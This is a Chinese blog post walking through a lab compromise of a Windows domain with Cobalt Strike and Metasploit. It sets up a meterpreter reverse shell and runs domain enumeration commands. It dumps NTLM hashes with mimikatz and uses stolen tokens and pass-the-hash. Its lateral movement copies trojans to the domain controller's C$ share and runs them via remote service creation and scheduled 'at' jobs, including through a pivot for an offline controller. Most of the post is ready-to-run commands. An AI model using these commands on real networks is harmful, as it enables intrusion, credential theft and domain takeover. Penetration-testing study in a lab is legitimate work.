【远控使用】Cobalt Strike横向渗透域控

前言

  • Cobalt Strike的基础使用,自建的域控,就一台用

搭建好了域控机

目标:

1、一台2008R2的DC 192.168.136.133

2、一台2003 server的域内机器 192.168.136.136

3、一台2008R2的B2 192.168.136.138

内网渗透拿域控

kali 192.168.1.104

一、cs上线

①直接用web传递发现失效了,原因是2003居然没有powershell,那就传马,由于cs马传上去无法运行,所以就用msf马监听拿到shell

1
2
3
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run

image-20210908184613412

②接着就将会话转给cs

1
2
3
4
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run

image-20210908184850148

二、cs派生会话

首先把它派生会话smb,可以绕防火墙

image-20210908184955567

image-20210908185045946

三、cs的命令使用以及信息收集

1、查看当前用户组

1
shell whoami/groups

2、查看域

1
shell net view /domain

image-20210908220051195

3、枚举域内主机

1
shell net view /domain:GYLQ

image-20210908220149806

4、查看DC的ip

1
shell ping WIN-NQ8TV3JGSN1

image-20210908220317639

接着我发现2003机子太low了,再添加一个2008的机子域内机子继续下面的测试,直接web传递,可以直接上线,server2008

5、查看域内成员

1
shell net group "domain Computers" /domain

image-20210909080349358

6、查看DC域控主机

1
2
shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以

image-20210909080625448

7、查看域的信任关系

1
shell nltest /domain_trusts

8、导入了powershell的模块powerview.ps1的使用

1
powershell Invoke-ShareFinder #查看共享的

image-20210909081245501

9、cs的列举域控命令

1
2
net dclist
net dclist /domain

10、列出共享cs命令

1
net share \\B1

11、判断是否能访问域控机的C盘,所以是域超级管理员

1
shell dir \\WIN-NQ8TV3JGSN1\C$

image-20210909082213125

12、查看域内的管理员

1
shell net group "enterprise admins" /domain

image-20210909082613139

13、域内的超级管理员

1
shell net group "domain admins" /domain

image-20210909082718262

14、查看域内组中的超级管理员

1
shell net localgroup "administrators" /domain

image-20210909082828930

15、cs中的查看管理员组的信息

1
net group \\WIN-NQ8TV3JGSN1

image-20210909083027873

16、查看远程的DC的管理员用户

1
net localgroup \\WIN-NQ8TV3JGSN1 administrators

image-20210909083506375

17、powerview模块的命令查看用户

1
powershell Get-NetLocalGroup -HostName WIN-NQ8TV3JGSN1

image-20210909083743109

18、单靠命令搜索用户,或者信息收集

1
2
3
4
5
6
7
8
9
1、查看登陆过的用户
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\users

2、查看敏感文件
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\"*pass*" "*user*" "*config*" "username.*" "password.*"

3、winrm执行powershell
列举C盘目录
powershell Invoke-Command -ComputerName WIN-NQ8TV3JGSN1 -ScriptBlock{ dir c:\}

image-20210909084747909

19、通过mimikatz抓取主域的NTLM

image-20210909090950387

1
2
3
4
5
6
msv :	
[00000003] Primary
* Username : B1$
* Domain : GYLQ
* NTLM : ccf1ceaea1d47a0948e5022bd4d7ae64
* SHA1 : 0ea509056cd0d8ab09f6deeec8ba2db643bae89e

四、内网登陆认证

1、制作token访问域控

1
2
steal_token 2688 域控的超级管理员pID
rev2self 恢复原来的令牌

image-20210909092712491

就可以访问域控的盘符

image-20210909092822870

2、制作令牌

image-20210909094824525

3、hash认证

1
pth GYLQ\Administrator 285deb0940e1630b59d2cd9590fcbc91

五、黄金票据

需要:用户、域名、域id krbtgt的hash

1、查看当前黄金票据

1
shell klist

2、获取域SID

shell whoami/user

1
2
3
用户名           SID                                        
================ ===========================================
b1\administrator S-1-5-21-204603982-2387576990-164658498-500

image-20210909111945631

3、清除当前票据

1
kerberos_ticket_purge

六、内网横向渗透获取权限

方法一

1、生成一个服务木马为test.exe

image-20210909124130444

然后上传到windows/users/administrator里面

image-20210909124342858

2、将其复制到域控机内的temp中的命令,然后命名为a1.exe

1
shell copy C:\Users\administrator\test.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a1.exe

image-20210909124622586

3、然后创建一个服务为a1

1
shell sc \\WIN-NQ8TV3JGSN1 create a1 binpath= c:\windows\temp\a1.exe

image-20210909124549860

4、接着执行刚刚创建的服务a1

1
shell sc \\WIN-NQ8TV3JGSN1 start a1

image-20210909124720994

5、接着域控的机子上线CS的system权限

image-20210909124808909

方法二

这次会比较简单一些,就是定时执行文件

还是创建一个木马

image-20210909125905362

1、然后保存为a2.exe,按照上面同样的命令复制到域控机内

1
2
3
4
shell copy C:\Users\administrator\a2.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a2.exe

查看是否上传成功
shell dir \\WIN-NQ8TV3JGSN1\C\windows\temp

2、查看域控当前时间

1
shell net time \\WIN-NQ8TV3JGSN1

image-20210909130133657

3、接着利用at来创建一个一分钟执行木马的计划

1
shell at \\WIN-NQ8TV3JGSN1 12:58:39 C:\windows\temp\a2.exe

image-20210909130158436

cs上线了

image-20210909130224917

方法三

上面做了个总结,下面是域控机无法联网的情况怎么办

1、这是用中转器来进行获取域控

image-20210909132957415

image-20210909133045542

2、接着生成一个a3.exe木马,返回beacon到刚刚创建的监听器

image-20210909133031147

3、将a3.exe木马上传到users\administrator目录中

image-20210909133234326

4、然后下面命令将木马复制到域控机内

1
2
3
4
shell copy C:\Users\administrator\a3.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a3.exe

查看是否复制成功
shell dir \\WIN-NQ8TV3JGSN1\C$\windows\temp

image-20210909133336372

5、查看当前时间和定时执行木马

1
2
3
shell net time \\WIN-NQ8TV3JGSN1

shell at \\WIN-NQ8TV3JGSN1 13:27:43 C:\windows\temp\a3.exe

image-20210909133430067

6、等到了我们定好的时间,不出网域控会smb形式上线

image-20210909133508072

结果图

image-20210909133926749

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】Cobalt Strike横向渗透域控

文章作者:孤桜懶契

发布时间:2021年09月07日 - 20:32:00

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/135.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------